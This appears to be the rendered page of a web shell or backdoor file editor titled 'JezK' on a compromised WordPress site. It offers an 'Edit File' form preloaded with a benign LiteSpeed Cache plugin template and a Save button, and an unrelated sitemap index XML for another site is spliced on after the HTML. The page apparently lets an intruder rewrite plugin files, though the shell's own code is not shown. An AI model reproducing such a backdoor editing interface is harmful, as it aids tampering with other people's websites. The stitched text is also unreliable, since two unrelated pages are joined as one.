
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>JezK</title>
<style>
    body {
        font-family: Arial, sans-serif;
        margin: 0;
        padding: 0;
    }
    #container {
        max-width: 800px;
        margin: 20px auto;
        padding: 20px;
        border: 1px solid #ccc;
        border-radius: 5px;
        background-color: #f9f9f9;
    }
    h1 {
        text-align: center;
        color: #333;
    }
    h2 {
        margin-top: 30px;
        color: #555;
    }
    ul {
        list-style-type: none;
        padding: 0;
    }
    li {
        margin-bottom: 10px;
    }
    a {
        text-decoration: none;
        color: #007bff;
    }
    a:hover {
        text-decoration: underline;
    }
    form {
        margin-top: 20px;
    }
    input[type="text"], input[type="file"], input[type="submit"] {
        margin-bottom: 10px;
    }
    hr {
        border: 0;
        height: 1px;
        background-color: #ccc;
        margin-top: 20px;
        margin-bottom: 20px;
    }
</style>
</head>
<body>
<div id="container">
    <h1>JezK</h1>
    <h2>Edit File: entry.tpl.php</h2><form method="post"><textarea name="file_content" rows="10" cols="50">&lt;?php
/**
 * LiteSpeed Cache Page Optimization Interface
 *
 * Renders the page optimization settings interface for LiteSpeed Cache with tabbed navigation.
 *
 * @package LiteSpeed
 * @since 1.0.0
 */

namespace LiteSpeed;

defined( &#039;WPINC&#039; ) || exit;

$menu_list = array(
	&#039;settings_css&#039;          =&gt; esc_html__( &#039;CSS Settings&#039;, &#039;litespeed-cache&#039; ),
	&#039;settings_js&#039;           =&gt; esc_html__( &#039;JS Settings&#039;, &#039;litespeed-cache&#039; ),
	&#039;settings_html&#039;         =&gt; esc_html__( &#039;HTML Settings&#039;, &#039;litespeed-cache&#039; ),
	&#039;settings_media&#039;        =&gt; esc_html__( &#039;Media Settings&#039;, &#039;litespeed-cache&#039; ),
	&#039;settings_vpi&#039;          =&gt; esc_html__( &#039;VPI&#039;, &#039;litespeed-cache&#039; ),
	&#039;settings_media_exc&#039;    =&gt; esc_html__( &#039;Media Excludes&#039;, &#039;litespeed-cache&#039; ),
	&#039;settings_localization&#039; =&gt; esc_html__( &#039;Localization&#039;, &#039;litespeed-cache&#039; ),
	&#039;settings_tuning&#039;       =&gt; esc_html__( &#039;Tuning&#039;, &#039;litespeed-cache&#039; ),
	&#039;settings_tuning_css&#039;   =&gt; esc_html__( &#039;Tuning&#039;, &#039;litespeed-cache&#039; ) . &#039; - CSS&#039;,
);

?&gt;

&lt;div class=&quot;wrap&quot;&gt;
	&lt;h1 class=&quot;litespeed-h1&quot;&gt;
		&lt;?php esc_html_e( &#039;LiteSpeed Cache Page Optimization&#039;, &#039;litespeed-cache&#039; ); ?&gt;
	&lt;/h1&gt;
	&lt;span class=&quot;litespeed-desc&quot;&gt;
		v&lt;?php echo esc_html( Core::VER ); ?&gt;
	&lt;/span&gt;
	&lt;hr class=&quot;wp-header-end&quot;&gt;
&lt;/div&gt;

&lt;div class=&quot;litespeed-wrap&quot;&gt;

	&lt;div class=&quot;litespeed-callout notice notice-warning inline&quot;&gt;
		&lt;h4&gt;&lt;?php esc_html_e( &#039;NOTICE&#039;, &#039;litespeed-cache&#039; ); ?&gt;&lt;/h4&gt;
		&lt;p&gt;&lt;?php esc_html_e( &#039;Please test thoroughly when enabling any option in this list. After changing Minify/Combine settings, please do a Purge All action.&#039;, &#039;litespeed-cache&#039; ); ?&gt;&lt;/p&gt;
	&lt;/div&gt;

	&lt;h2 class=&quot;litespeed-header nav-tab-wrapper&quot;&gt;
		&lt;?php GUI::display_tab_list( $menu_list ); ?&gt;
	&lt;/h2&gt;

	&lt;div class=&quot;litespeed-body&quot;&gt;
	&lt;?php
		$this-&gt;form_action();

		// Include all tpl for faster UE
		foreach ( $menu_list as $tab_key =&gt; $tab_val ) {
			GUI::display_tab_layout( $menu_list, $tab_key );
			require LSCWP_DIR . &#039;tpl/page_optm/&#039; . $tab_key . &#039;.tpl.php&#039;;
			echo &#039;&lt;/div&gt;&#039;;
		}

		$this-&gt;form_end();
	?&gt;
	&lt;/div&gt;

&lt;/div&gt;</textarea><br><input type="submit" value="Save"></form></div>
</body>
</html>

<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="https://looker.af/wp-sitemap-index.xsl" ?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"><sitemap><loc>https://looker.af/wp-sitemap-posts-post-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-posts-page-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-taxonomies-category-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-users-1.xml</loc></sitemap></sitemapindex>
